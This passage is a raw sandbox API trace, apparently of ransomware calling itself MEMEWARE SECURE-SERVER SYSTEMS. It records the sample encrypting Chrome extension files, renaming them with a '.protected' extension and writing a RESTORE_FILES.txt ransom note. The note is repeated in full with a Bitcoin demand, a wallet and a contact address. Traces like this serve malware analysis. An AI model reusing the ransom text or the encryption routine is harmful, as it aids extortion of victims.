(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.529] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.530] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.530] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.530] CloseHandle (hObject=0x164) returned 1 [0081.530] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0081.530] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned 141 [0081.530] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0081.530] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0081.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*") returned 143 [0081.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.530] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.530] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.530] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.530] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\.") returned 143 [0081.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.530] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.530] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.530] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.530] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\..") returned 144 [0081.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.530] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.531] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.531] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.531] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.531] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.531] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.531] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.532] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.532] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.532] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.532] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.532] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.532] CloseHandle (hObject=0x168) returned 1 [0081.532] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.protected") returned 165 [0081.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.protected")) returned 1 [0081.533] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.533] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.533] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0081.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.533] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.533] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.534] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.534] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.534] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.534] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.534] CloseHandle (hObject=0x164) returned 1 [0081.534] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0081.534] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned 141 [0081.534] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0081.534] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0081.534] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*") returned 143 [0081.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.535] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.535] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.535] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.535] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.535] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.535] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\.") returned 143 [0081.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.535] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.535] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.535] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.535] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.535] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.535] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.535] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\..") returned 144 [0081.535] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.535] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.535] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.535] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.535] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.535] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.535] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.535] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.536] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.536] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x127, lpOverlapped=0x0) returned 1 [0081.536] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.536] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x127, lpOverlapped=0x0) returned 1 [0081.536] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.536] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.536] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.536] CloseHandle (hObject=0x168) returned 1 [0081.537] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.protected") returned 165 [0081.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.protected")) returned 1 [0081.537] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.537] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.537] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0081.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.537] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.537] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.538] lstrlenA 